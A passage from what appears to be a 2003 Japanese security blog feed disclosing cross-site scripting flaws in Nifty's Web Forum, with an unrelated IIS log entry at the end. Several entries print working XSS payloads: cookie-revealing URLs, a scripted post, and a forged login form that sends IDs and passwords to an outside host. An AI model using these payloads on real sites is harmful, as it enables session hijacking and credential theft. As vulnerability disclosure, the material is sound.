class="quote-and-cite"><blockquote><p>パレットでのタグの利用について</p><p>パレットでのタグの制限につきましてご案内が遅れましたこと、お詫び申し上げます。今回パレットを安全にご利用いただけるよう対応をおこない、一部のHTMLタグの記述を制限させていただきました。</p><p>この制限はブラウザでの発言の表示となります。ニュースリーダーでのアクセスでは、オリジナルのデータを取得することとなります。</p><p>詳細は「パレットの基本仕様」または「よく使うＨＴＭＬタグ」をご参照ください。</p><p>引き続き、みなさまに安心してご利用頂けるよう努力いたしますので、今後ともどうぞよろしくお願いいたします。</p></blockquote><p class="cite">以上、https://com.nifty.com/forum/ より</p></div><p>というわけで、<dfn class="glossary"><a href="../../glossary/%E3%82%B5%E3%83%8B%E3%82%BF%E3%82%A4%E3%82%BA">サニタイズ</a></dfn>が強化されたようです。</p><p>ところがどっこい、このサニタイズを貫通する書き方があって、なんと <dfn class="element"><a href="../../ref/html/element/script">script要素</a></dfn>を含む発言ができてしまうことが判明。</p><p class="note">※具体的な方法は伏せておきます。ヒントとしては、サニタイズのルーチンが賢いのが逆に敗因になった感じ。特殊な制御文字なども不要ですし、やり方さえ分かれば誰でも気軽に書き込めます。</p><p>……どこかで<dfn class="glossary"><a href="../../glossary/%E9%AB%98%E6%9C%A8%E3%81%95%E3%82%93">高木さん</a></dfn>も書いていたような気がしますが、「特定のタグだけのサニタイズ」って本当に難しいものですね。</p><p>なお、パレットの認証は Basic 認証で、Cookie は関係ありません。パレットだけを使用している分には、セッション Cookie の漏洩はありません。また、ここに書けるのは会員だけです。</p><p>ただし、会員がコミュニティなどにログインし、そのままパレットを閲覧すると危険な場合があります (これは Cookie ドメイン問題の影響)。また、普通に書いても <dfn class="element"><a href="../../ref/html/element/img">img要素</a></dfn>で外部の画像を参照することはできるので、Web バグを使用したり、ひそかに hpcgi1.nifty.com の画像を参照して Cookie を取得したりすることは可能です。</p><p>……などということをのんきに考えていましたが、実はそれだけではなく、<strong>Microsoft.XMLHTTP で Basic 認証の ID とパスワードをこっそり盗める</strong>ので、きわめて危険です。実際に Base64 エンコードされた ID:パスワードの組が画面に表示されることを確認、デコードしたら簡単に ID とパスワードが取り出せました。分かると思いますが、この値を密かに他のサーバに送出することも可能です。本気で洒落になりません……。</p><p class="note">※Microsoft.XMLHTTP でパスワードが盗めるという情報は<dfn class="glossary"><a href="../../glossary/%E3%81%88%E3%82%80%E3%81%91%E3%81%84%E3%81%95%E3%82%93">えむけいさん</a></dfn>から頂きました。情報感謝です。これについての詳細は、高木さんによる「<a href="http://memo.st.ryukoku.ac.jp/archive/200301.month/5237.html">[memo:5237] XSS脆弱性によりBasic認証のパスワード情報が漏えいする</a> <em class="domain-info">(memo.st.ryukoku.ac.jp)</em>」を参照してください。</p><p class="note">※また、Mozilla などでも XMLHttpRequest を使用すれば全く同様にパスワードが盗めるようです。Flash や Java Applet でも OK なようで、スクリプト無効でも駄目っぽいです。この辺まとめてえむけいさん情報。</p><p>さらに恐ろしいことに、パレットには任意のファイルを添付ファイルとして指定できる機能があります。この添付ファイルは同じドメインのサーバ内に格納されます。そして発言には <dfn class="element"><a href="../../ref/html/element/object">object要素</a></dfn>を書くこともできてしまうので、ユーザのセキュリティ設定によっては任意の ActiveX コントロールを実行することさえできます。</p><p class="note">※実際にこの方法で Flash を実行できることを確認しました。</p><p>これはスクリプト無効でも駄目なので、パレットには近寄らないのが無難でしょう。</p><ins datetime="2003-07-04"><p>2003-07-04 追記 : 「私は把握していなかった」と書きましたが、パレットに何でも書けてしまうということは公開当初から知られていたようです。「<a href="http://forum.nifty.com/fprog/palette_howto2.htm">パレット裏マニュアル</a> <em class="domain-info">(forum.nifty.com)</em>」に、パレットの発言をフレームにして他のリソースを丸ごと取り込む方法が紹介されています。今回の修正が行われる前は、文字通りの意味で何でも書けたようですね。</p><p class="note">※FPROG 会員なのに気づいてなかった私って……。</p></ins><ul class="comment-link"><li><a href="../topic/688/comment">「サニタイズ貫通(XSS大王シリーズ)」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">ニフティ</a> / <a href="../genre/XSS%E5%A4%A7%E7%8E%8B">XSS大王</a></span></p></div></div></content></entry><entry><title>XSS大王の傾向と対策</title><link href="http://bakera.jp/ebi/topic/692" /><id>tag:bakera.jp,2008:/ebi/topic/692</id><updated>2003-07-04T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/7/3">2003年7月3日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/692">XSS大王の傾向と対策</a></h2><p class="subinfo"><span class="updated">更新: 2003年7月4日</span></p><p>こんなんでました。</p><div class="quote-and-cite"><blockquote><p>いつもフォーラムをご利用いただきましてありがとうございます。</p><p>本日（7/3） のメンテナンスにおいて、まずは、掲示板（セミオープン／会員限定）へ新規に発言やコメントの登録をする際、一部のHTMLタグの記述を制限する対策を行いました。制限をしているタグなど詳しくはこちらをご覧ください。</p><p>また、この後、引き続き、これまでに登録された発言やコメントについての対策を行う予定です。そのため、全ての作業が終わるまでの間、新規発言やコメントで、タグが利用されていた場合には、そのまま表示されることとなりますのでご留意ください。</p><p>なお、機能再開の時期につきましては、現在、 7月末の見込みですが、具体的な日時が判明次第、ご案内申しあげます。</p><p>ご迷惑をおかけし、申し訳ございませんが、何卒ご理解賜りますようお願いいたします。</p></blockquote><p class="cite">以上、https://com.nifty.com/forum/ より</p></div><p><dfn class="glossary"><a href="../../glossary/%E3%82%B5%E3%83%8B%E3%82%BF%E3%82%A4%E3%82%BA">サニタイズ</a></dfn>を強化したけれども、既存の発言はそのままなので注意ということらしいです。もちろん、既存の発言の中に罠が含まれていないかは精査しているのでしょうね。</p><p class="note">※と、信じたいですけれど。</p><p>では早速サニタイズぶりを検証……と思ったら、掲示板の方はまだメンテナンス中のようで残念な思いをいたしました。アナウンスを更新したタイミングで何かが発生したのかしら。</p><p>18:45 頃に確認したら掲示板は復旧していました。でも何の属性もついていない <dfn class="element"><a href="../../ref/html/element/b">b要素</a></dfn>すら書けませんね。アナウンスの日本語がイマイチ意味不明なのですが、7月末までは一切のタグが書けないということなのかも知れません。<em class="note">※だとすると、今日行われたのが何だったのか良く分からないのですが……。</em></p><ins datetime="2003-07-04"><p>2003-07-04 追記 : 「Web 快適活用フォーラム」に分かりやすいアナウンスが出ていました。</p><div class="quote-and-cite"><blockquote><p>上記の内容では、使用できるタグが制限されるものの、もう使えるようにも読めますが、実際には、まだ全面禁止のままです。</p><p>それだけではなく、タグとしての動作が禁止されているにもかかわらず、上記の制限がされるという、大変、困惑する状態となってしまいました。</p><p>例えば、制限されるタグである「＜ｈｔｍｌ＞」を半角で記述すると、今までは無効なタグでしたので、そのまま、表示されていましたが、現在は削除されてなくなってしまいます。</p><p>従って、スタイルシート指定どころか、html文書の記述も、ほぼ不可能となってしまっています。</p><p>この処置は、７月末までの暫定的なものとのことですが、８月以降もタグ有効な掲示板においては、制限されたタグの記述は削除される模様です。</p></blockquote><p class="cite">以上、http://bbs1.nifty.com/mes/cf_wrent/FWEBKK_B001 より</p></div><p>ということだそうで、いろいろな意味で頭が痛いですね。</p></ins><ul class="comment-link"><li><a href="../topic/692/comment">「XSS大王の傾向と対策」へのコメント (4件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">ニフティ</a> / <a href="../genre/XSS%E5%A4%A7%E7%8E%8B">XSS大王</a></span></p></div></div></content></entry><entry><title>XSS大王</title><link href="http://bakera.jp/ebi/topic/649" /><id>tag:bakera.jp,2008:/ebi/topic/649</id><updated>2003-06-27T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/6/18">2003年6月18日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/649">XSS大王</a></h2><p class="subinfo"><span class="updated">更新: 2003年6月27日</span></p><p>ニフティの <a href="http://com.nifty.com/forum/index.html">Web フォーラム</a> <em class="domain-info">(com.nifty.com)</em>において、私が見てきた中で最大の<dfn class="glossary"><a href="../../glossary/%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E8%84%86%E5%BC%B1%E6%80%A7">クロスサイトスクリプティング脆弱性</a></dfn>を発見してしまいました (ただし、一部は私が発見したのではなく<dfn class="glossary"><a href="../../glossary/%E3%82%8A%E3%82%85%E3%81%86%E3%81%95%E3%82%93">りゅうさん</a></dfn>による情報です)。</p><ul><li>ログインフォームと同ドメイン同スキーム (https) の検索フォームに <dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn> があるため任意のスクリプトが実行可能。セッション Cookie 漏洩の可能性あり。</li><li>ログイン後においてスクリプトを含む任意の発言 (書き込み) ができる会議室が存在するため、やはりセッション Cookie 漏洩。場所によってはログインしないで書き込むことができ、それをログイン後の状態の会員が見たりするので凶悪です。</li><li>ログインフォーム自体に特大の XSS が存在。フォームを含むパラメータを渡してログインフォーム捏造可能。元フォームが https なので、捏造されたフォームも SSL 保護つき、サーバ証明書も付いていてばっちりです。</li><li>ログインフォームに渡した別のパラメータが、その先の画面で <dfn class="element"><a href="../../ref/html/element/script">script要素</a></dfn>の中に出力されます。やっぱり任意のスクリプト実行可能でセッション Cookie 漏洩。</li></ul><ins datetime="2003-06-27"><p class="note">※以下は 20日削除、27日再公開部分。いずれも現在は修正されていますので、解説のような現象は起きません。</p><p>せっかくなので詳細に説明します。まず検索フォームについてですが、以下のような URL をリクエストするとクロスサイトスクリプティング脆弱性によって Cookie の値が表示されます。</p><div class="sample"><p>https://com.nifty.com/forum/circle/search.go?free=&lt;script&gt;document.write(document.cookie)&lt;/script&gt;&amp;SearchCircleStatus=CircleSearchServlet4</p></div><p>これはログインフォームと同じドメイン・スキームです。パスは違いますが、ログインフォームで発行される Cookie は path=/ と指定されているので問題ありません。</p><p>次に書き込みですが、Web フォーラムには &lt;TAG OK!&gt; とされている掲示板があります。そのような会議室では任意のスクリプトを含む投稿が可能です。たとえば以下のような文字列を投稿します。</p><div class="sample"><p>&lt;b style="display: block; position: relative; width: 100%; height; 5em; font-size: 200%;" onmouseover="var id = 'あなたのセッション ID は「' + document.cookie + '」です。&lt;br&gt;もし、セッション ID の値が表示されていたら危険です。この値を知られるとセッションハイジャックが行われる可能性があります。このスクリプトは外部にセッション ID を送出することはしていませんが、悪意あるユーザはセッション ID を外部に送出し、それを使ってセッションハイジャックを行おうとするかも知れません。&lt;br&gt;画像も表示できることですし、セッション ID を外部に送出するのは簡単です。&lt;br&gt;&lt;br&gt;合掌。&lt;img src=&amp;quot;http://www.nifty.com/policy/images/nifty_w-S32.gif&amp;quot;&gt;'; foo = window.open(); foo.document.writeln(id);"&gt;Click Me!!&lt;/b&gt;</p></div><p>このデモは、マウスが近くに来ると警告のウィンドウが開きます。実際の攻撃では警告ウィンドウなど表示せず、ひっそりと外部にセッション ID を送ることになるでしょう。上記のデモはわざと凝った作りにしていますが、<dfn class="element"><a href="../../ref/html/element/img">img要素</a></dfn>が使用できるので、攻撃はもっとずっと容易です。</p><p class="note">※なお、実際に上記のデモを <a href="http://bbs1.nifty.com/mes/cf_wrent/FWEBKK_B007">Web 快適活用フォーラムのお試しB</a> <em class="domain-info">(bbs1.nifty.com)</em> に投稿して動作を確認しています。現在では該当発言は (おそらくは管理者によってひっそりと) 削除されています。</p><ins datetime="2003-06-27"><p class="note">※2003-06-21 追記: ひっそりと、などと書いていましたが、その後管理者の Ｔｉｇｅｒさんから正式にご連絡いただきました。Ｔｉｇｅｒさんにはその後も大変お世話になりました。本当にありがとうございました。</p></ins><p>さて次ですが、ログインフォーム捏造というのは、たとえばこんな URL をリクエストします。action の値を変えれば好きなところにパスワードを送らせることができます。</p><div class="sample"><p>https://com.nifty.com/forum/login.go?RETURL=&amp;wr_url="&gt;&lt;/form&gt;&lt;form action="http://altba.com"&gt;ID:&lt;input name="id"&gt;&lt;br&gt;パスワード:&lt;input name="pass"&gt;&lt;br&gt;&lt;input type="submit" value="ログイン"&gt;&lt;/form&gt;&lt;table style="display:none;</p></div><p class="note">※最初の <dfn class="element"><a href="../../ref/html/element/form">form要素</a></dfn>終了タグは本物のフォームを無効化するために、最後の <dfn class="element"><a href="../../ref/html/element/table">table要素</a></dfn>開始タグは本物のフォームコントロールを隠蔽するために使用しています。引用符が閉じていないように見えるのは、この値が本来は属性値の中に出力されるためです。なお、このデモはフォームコントロールの配置にこだわっていませんが、<dfn class="glossary">style属性</dfn>に任意の値が指定できますので、本物そっくりの配置にすることも可能です。</p><p>このような URL をリクエストするリンクを作り、うまい文言でユーザを誘導します。ユーザが捏造に気づかずにログインを試みてくれれば成功で、攻撃者の望んだところに ID とパスワードが送られます。これは @nifty の ID とパスワードそのものを盗むことができるので、セッションハイジャックよりもずっと危険です。</p><p>最後 4番目ですが、問題のログインフォームには、引数として「ログイン後の遷移先 URL」を渡すことができます。これがこともあろうに、ログイン後画面の location.href= として実装されているため、<dfn class="element"><a href="../../ref/html/element/script">script要素</a></dfn>の中に任意のスクリプトを書くことができます。たとえば</p><div class="sample"><p>https://com.nifty.com/forum/login.go?RETURL=";alert(document.cookie);var%20foo="</p></div><p>などをリクエストします。ログインフォームの中では URL エンコードされているので無害になりますが、ログインに成功したあとでスクリプトが実行されます。</p><p class="note">※お尻の var foo=" はスクリプトエラーにならないようにするためのダミーです。なお、少なくとも IE6 SP1 の場合は、location.href="foo"; alert("bar"); と書いてある場合、alert が実行されてから遷移するようです。つまり location.href の後ろに悪意あるスクリプトを書いても OK ということです。</p><p class="note">※ここまで 20日削除、27日再公開部分。</p></ins><p>おそらくは他にもあるでしょうが、私が気づいたのはこれだけです。しかし、いずれもユーザが気づかないうちにセッションハイジャックが行われたり、生のパスワードが漏洩する可能性がある危険なものです。これらの攻撃のほとんどはスクリプトを無効にすることで防ぐことができます (3番目のフォーム捏造を除く)。しかしながら、Web フォーラムではスクリプトを有効にすることが推奨されている (実際、有効にしないとメニューの一部が機能しない) ので、Web フォーラムにログインするユーザのほとんどはスクリプトを有効にしていることでしょう。</p><p>これだけあると報告するだけでも一苦労ですが、危険が大きすぎるので頑張って報告したいところです……が、諸事情により、私はニフティのフォーラム部とはもう関わり合いたくないと思っていたりするので、報告する気が起きないのでした。そんなわけで、むしろ危険性をより多くの人に知ってもらう方向で動くことにします。</p><p>善意<del datetime="2003-06-19">と暇</del>のある方は、ニフティに報告してあげてください。</p><p>そうでない方がとりあえず対処したい場合、方法は二つほど考えられます。</p><ul><li>Web フォーラムを一切利用しない。</li><li>不便だがスクリプトを無効にして利用する。スクリプト無効で利用できない機能については、諦める。</li></ul><p>好きな方を選んでください。<ins datetime="2003-06-19">ただし、フォーム捏造については処置無しです。</ins></p><ins datetime="2003-06-20"><p class="note">※2003-06-20 追記 : 善意ある方が現れましたので、内容の一部を伏せました。</p></ins><ins datetime="2003-06-27"><p class="note">※2003-06-27 追記 : クロスサイトスクリプティング脆弱性<em>は</em>修正されましたので、伏せた内容を再公開しました。修正済みですので、現在は上記の攻撃はいずれも成立しません。もっとも、別のセキュリティホールは残っていますが……。</p></ins><ul class="comment-link"><li><a href="../topic/649/comment">「XSS大王」へのコメント (14件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">ニフティ</a> / <a href="../genre/XSS%E5%A4%A7%E7%8E%8B">XSS大王</a></span></p></div></div></content></entry><entry><title>XSS大王Q&amp;A</title><link href="http://bakera.jp/ebi/topic/665" /><id>tag:bakera.jp,2008:/ebi/topic/665</id><updated>2003-06-27T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/6/25">2003年6月25日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/665">XSS大王Q&amp;A</a></h2><p class="subinfo"><span class="updated">更新: 2003年6月27日</span></p><p>各所で話題になっているようですが、それなりに勘違いされている人もいるようなので、 Q&amp;A を少し。何のことか分からない方は日経 BP の「<a href="http://itpro.nikkeibp.co.jp/free/NC/NEWS/20030623/3/">ITPro ニュース:@niftyの電子掲示板に「クロスサイト・スクリプティングぜい弱性」，緊急メンテナンスを実施</a> <em class="domain-info">(itpro.nikkeibp.co.jp)</em>」を読んだ上で、<a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">話題「ニフティ」を含むえび日記</a>を一通り読んでみてください。</p><dl><dt>Q1. この脆弱性を利用できるのはニフティ会員だけなんだろ？</dt><dd><p>NO。<dfn class="glossary"><a href="../../glossary/%E3%83%9E%E3%83%8D%E3%82%B8%E3%83%A3%E3%83%BC">マネジャー</a></dfn>などから「ログインした人だけにしか悪用できないので、悪用されても発覚する」という説明がなされていることもあるようですが、それは違います。そもそも、内部の書き込みによる <dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn> は多数ある問題のうちのひとつに過ぎません。また、掲示板によってはログインしないで書き込みできるものも存在していました。日経 BP の記事にもそのような誤解を招く書き方がありますが、ニフティ会員にしか悪用できない性質のものではないのです。</p><p>特に今回のケースでは、問題が一点だけではないことに注意してください。</p></dd><dt>Q2. 結局どんな脆弱性があったんだ？</dt><dd><p>当初公開されたのは以下の 4点です。</p><ul><li>検索フォームの脆弱性によるセッション Cookie 漏洩 (修正済み)</li><li>Webフォーラム書き込みの脆弱性によるセッション Cookie 漏洩 (タグ書き込み機能一時停止により対処、現在修正中)</li><li>https://com.nifty.com/forum/login.go のログインフォーム<dfn class="glossary"><a href="../../glossary/%E6%94%B9%E7%AB%84">改竄</a></dfn>による ID ・パスワード漏洩 (修正済み)</li><li>https://com.nifty.com/forum/login.go ログインフォームの脆弱性によるセッション Cookie漏洩 (修正済み)</li></ul><p>セッション Cookie が漏洩すると、成りすましログインができてしまいます。誰かに成りすまして投稿したり、プロフィールを閲覧、修正したりすることができます。ID・パスワードが漏洩するとどうなるのかは、まあ説明するまでもないでしょう。</p><p>さらに、以下の問題が公になっています。これはニフティも把握していますが、対応予定は未定です。</p><ul><li>セッション Cookie のドメイン設定の問題により、nifty.com 以下の任意のサイトでセッション Cookie の値を読み取れてしまう。セッション Cookie 漏洩。</li></ul><p>また、別の様々な場所にクロスサイトスクリプティング脆弱性が存在することが報告されています。これは私が個人的につかんでいる情報で、まだ公にはなっていません。exploit コードが実際に動作することは確認しています。</p><ins datetime="2003-06-26"><p class="note">※2003-06-26 追記: 私が把握したものについては全て報告済みですので、修正されることが期待されます。情報を提供してくださった方に感謝いたします。</p></ins><ins datetime="2003-06-27"><p class="note">※2003-06-27 追記: 25日に追加で報告した 3ヶ所のクロスサイトスクリプティング脆弱性は、27日のメンテナンスで修正されました。予想以上に素早い対応で、これは高く評価したいと思います。ただし、Cookie ドメインの問題はまだ残っていますので注意が必要です。</p></ins></dd><dt>Q3. そんな捏造フォームには誰もだまされないだろ？</dt><dd><p>単に「似たようなフォームを持つページを別途作る」という話だと誤解していませんか？</p><p><dfn class="glossary"><a href="../../glossary/%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E8%84%86%E5%BC%B1%E6%80%A7">クロスサイトスクリプティング脆弱性</a></dfn>によるフォーム捏造の場合、本物と同じ URL を持ち、本物と同じ SSL の保護が付き、本物と同じサーバ証明書がついたフォームが作れます。もちろん見た目にも全く本物と同じにできます。怪しいパラメータがつくことがありますが、本物のフォームにも長いパラメータがつきますので判別は困難ですし、パラメータを隠蔽したければ POST メソッドを使って渡してやっても問題なく動作することを確認しています。正直、私はこれにだまされない自信はありません。</p><p>具体例が想像できない方は、フォームの送り先だけがひそかに<dfn class="glossary"><a href="../../glossary/%E6%94%B9%E7%AB%84">改竄</a></dfn>されている、というイメージで捉えると良いと思います。本物と全く同じところに入力して、しかしながら送り先が攻撃者のサーバというわけです。もちろん攻撃者のサーバは、ID とパスワードを記録したらちゃんと正しい場所へリダイレクトしてくれるでしょうから、ログインは成功します (失敗したってパスワード間違えたか、くらいにしか思わないでしょうが)。</p><ins datetime="2003-06-27"><p class="note">※2003-06-27 追記: ログインフォームに存在していたクロスサイトスクリプティング脆弱性は、27日のメンテナンスで修正されました。私が知る限りの範囲では、この脆弱性が利用される余地はなくなりました。……あくまで、私の知る限りの範囲に限った話ですが。</p></ins></dd><dt>Q4. サーバに侵入することはできなかったんだろ？</dt><dd><p>ええと、クロスサイトスクリプティング脆弱性の問題を理解していますか？　これはそもそも侵入するとかしないとかいう問題ではありません。答えとしては YES になりますが、だからといって問題ないというわけではありません。そもそも私はサーバに侵入なんて試みてさえいませんので、そこのところ一つ。</p></dd><dt>Q5. そういうことは実際他人の ID を盗んでから言え！</dt><dd><p>私はいちおう exploit コードを実際にテストして動作確認しています。私もニフティの会員ですので、自分自身のセッション Cookie や ID、パスワードが盗めるかどうかテストしました。結果、盗めました。私はこれで十分だと思うのですが……実際に他人のを盗んでしまったら犯罪になりますんで、勘弁してください。</p><p class="note">※……なんか、手元のログに私のテストじゃないのも残ってたりするんですが、これはテストだと信じたいなぁ。</p></dd><dt>Q6. スクリプト無効で対処できる？</dt><dd><p>残念ながら NO です。これで対処できるのなら私などは安心なのですが……。</p><p>ただし、攻撃手法によってはスクリプト無効で防ぐことができる場合もありますので、効果が全くないわけではありません。</p></dd><dt>Q7. 実際に被害は発生していないんだろ？</dt><dd><p>ニフティはそう主張しているようですが、何とも言えません。少なくともニフティには exploit の形跡が残っており、しかしながらその追跡調査は行われていません。つまり、被害が発生したかどうかについての調査は行われていないのです。</p><p>また、そもそもこれによる被害は明るみに出ない性質のものです。ひそかに個人情報が盗まれて売却されていたとして、その被害に気づきますか？ 被害報告がないことをもって被害が発生していないと判断するのは早計に過ぎます。</p></dd><dt>Q8. 今は問題は修正されてるんだろ？</dt><dd><p>残念ながらされていません。前の回答と重複しますが、対応されたのは Web フォーラム内部の書き込みで、これは問題の一つに過ぎません。未対応の問題がいくつも残っています。</p></dd><dt>Q9. 俺がやってみるから exploit 教えてくれ！</dt><dd><p>やらないでください。自分でテストするだけなら良いですが、人を罠にはめると犯罪なので……。そもそも、普通の Web 制作の知識があれば、教えるまでもなく普通に思いつくと思います。って、自分で思いついても自分でテストするだけにしてくださいね。</p></dd><dt>Q10. ていうか、exploit 公開してたんでしょ？</dt><dd><p>していました。その exploit が実際に機能し、それに脅威を感じたからこそこれだけ素早く動いたのではないかと思います。そんなわけで、公開していた exploit は今は通らなくなっています。……公開していた分は、ですが。</p></dd><dt>Q11. 騒ぎすぎだろ。</dt><dd><p>ええと、まず日経 BP の記事を書いたのは私ではないので、その点ご理解ください。</p><p>それから、私が Web フォーラムに初めてログインしたのは 6月18日です。初めてログインしたときには、既に脆弱性の存在に気づいていました。ですから私などは最初から用心していたわけで、被害にはまず遭っていないだろうと思われます。特にあわてる必要もないわけです。</p><p>ただ、何も知らずに以前から Web フォーラムを利用していた方は、それは心配になるでしょう。何しろ自分の知らないうちに ID やパスワードが盗まれていて、密かに個人情報が盗まれているかも知れないわけですから。騒ぎすぎ、と言うことはないと思います。</p></dd><dt>Q12. 個人情報が盗まれたってどうってことないだろ。</dt><dd><p>そう考える人がいてもおかしくはないですね。しかし、そうは考えない人も多いはずです。ID とパスワードが盗まれると、個人情報が盗まれるだけでは済みませんしね。</p></dd><dt>Q13. システム側の対処としては入力値をサニタイズすれば OK?</dt><dd><p>クロスサイトスクリプティング脆弱性にはそれで対処できます。<dfn class="glossary"><a href="../../glossary/%E3%82%B5%E3%83%8B%E3%82%BF%E3%82%A4%E3%82%BA">サニタイズ</a></dfn>が適切ならば、の話ですが。</p><p>しかし困ったことに、クロスサイトスクリプティング脆弱性とは関係のないセキュリティホールも存在しています。それは「Cookie のドメイン範囲の問題によって nifty.com 以下どこでもセッション Cookie が読める」という問題です。この問題の詳細は「<a href="../topic/657">XSS大王・さらなるホゥル</a>」を参照していただきたいと思いますが、これはサニタイズの有無とは全く関係ない問題なので、すぐに修正することは難しいと思います。もちろん現時点では未修正です。</p></dd><dt>Q14. Cookieのドメイン問題が修正されているかどうかはどうすれば分かりますか？</dt><dd><p>Web フォーラム (や、@niftyコミュニティ) にログイン後に Cookie操作装置 (http://hpcgi1.nifty.com/bakera/set-cookie.cgi <em class="note">※現在 NOT Found です</em>) のようなものにアクセスしてみて、PARAMD という Cookie の値が表示されるかどうか見てください。表示されていれば、セッション Cookie は簡単に盗める状態です。</p></dd><dt>Q15. 大手がやってたから問題になっただけで、掲示板にタグが書けるなんてどこにでもある話なのでは？</dt><dd><p>どこにでもある、というご意見には同意します。クロスサイトスクリプティング脆弱性は、もういたるところに存在していて、もううんざりするほど見てきました。</p><p>ただ、今回の件で特に問題なのは、そこが会員のログインを要する場所であり、そのセッション Cookie が漏洩する問題があった点でしょう。同様に ID・パスワード漏洩の危険性もありましたが、これは @nifty のダイヤルアップ PPP 接続に使える他、もうありとあらゆることに使えてしまいます。</p><p>そんなわけで、ログイン機能を持たない掲示板とは少々事情が異なるものと思います。まあ、ログイン機能がなければ脆弱でも問題ない、というわけではないのですが……。</p></dd></dl><p>とりあえず、こんなところですか。</p><p>他にも質問がありましたら随時答えたいと思いますので、質問のある方はコメントとして書いてみてください。</p><ul class="comment-link"><li><a href="../topic/665/comment">「XSS大王Q&amp;A」へのコメント (13件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">ニフティ</a> / <a href="../genre/XSS%E5%A4%A7%E7%8E%8B">XSS大王</a></span></p></div></div></content></entry><entry><title>ログの URL 末尾にスラッシュを捏造する IIS</title><link href="http://bakera.jp/ebi/topic/519" /><id>tag:bakera.jp,2008:/ebi/topic/519</id><updated>2003-04-25T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/4/17">2003年4月17日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/519">ログの URL 末尾にスラッシュを捏造する IIS</a></h2><p class="subinfo"><span class="updated">更新: 2003年4月25日</span></p><p>だいぶ前から、こんな感じの不思議なログがあって気にはなっていたのですが。</p><div class="sample"><p>GET /foo/ - 302 <br />GET /foo/ - 403 </p></div><p class="note">※ここで foo は仮名ですが、そのディレクトリは存在しています。</p><p>いろいろ調べてみると、どうも GET /foo という末尾にスラッシュのないリクエストに対して /foo/ へのリダイレクトを発行したときに、<samp>GET /foo/ - 302</samp> というログが残る模様。リクエストされたのは /foo なのに、ログには /foo/ と残ります。IIS が<em>勝手に</em>末尾にスラッシュをつけているようです。<dfn class="glossary"><a href="../../glossary/PATH_INFO">PATH_INFO</a></dfn> が無くなってしまう点と言い、なんかどんどん IIS のログが信用できなくなってくるわけですが……。IIS6 では良くなっているのでしょうか。</p><p>ちなみにこのログが残るパターン、最近割と良く出現しているのですが、User-Agent は「dloader(NaverRobot)/1.0」で、見るからにロボットです。そもそも /foo をリクエストしている時点でおかしいと思うのですが、<em>/foo/ へのリダイレクトを何度喰らっても一向に学習しない</em>あたり、何とかならないのでしょうか。</p><ins datetime="2003-04-25"><p class="note">※追記: ごめんなさい、誤解を招く記述でしたが、学習しないというのは 302 を理解しないという意味ではなくて、何度 302→403 を喰らっても懲りずに /foo をリクエストするのはちょっとなぁ、という話でした。</p><p class="note">※さらに追記: しかし考えてみると、302 のレスポンスはむしろ Permanently な移転ではない、という意思表示な訳で、また別の機会にリクエストしたら違うレスポンスになる可能性があるわけです。なので、302 → 403 を喰らっても懲りないのは、むしろ正しい挙動だと思います。……って、実は<dfn class="glossary"><a href="../../glossary/%E3%81%88%E3%82%80%E3%81%91%E3%81%84%E3%81%95%E3%82%93">えむけいさん</a></dfn>に思いっきり突っ込まれたのですが。</p></ins><p>ついでに調べてみると、ここ一週間ほどで 302 が発行されたのは、このロボットに対してだけでした。つまり /foo に外部からリンクされていたりする形跡も無いわけです。このロボットが勝手に上のディレクトリを参照しようとして、その時に末尾の / を落としているものと思われます。</p><ins datetime="2003-04-25"><p class="note">※追記: これまたごめんなさい、実は外部から /foo/ に対するリンクがありました。でも /foo に対するリンクではなく /foo/ に対するリンクなので、それで /foo をリクエストするのも変なのですが。</p></ins><p>……せっかくなのでこのロボットについてちょっと調べてみましたが、「<a href="http://c-moon.jp/robots.shtml#nabot">robotはぢきについて</a> <em class="domain-info">(c-moon.jp)</em>」というサイトの「その他・危険ロボット」の中にそれらしきものが……。あんまりよろしくないロボットらしいですね。</p><p class="note">※ところで、User-Agent と言えば Some Gripes on User-Agent (http://www.dais.is.tohoku.ac.jp/logs/agentgripes.html) 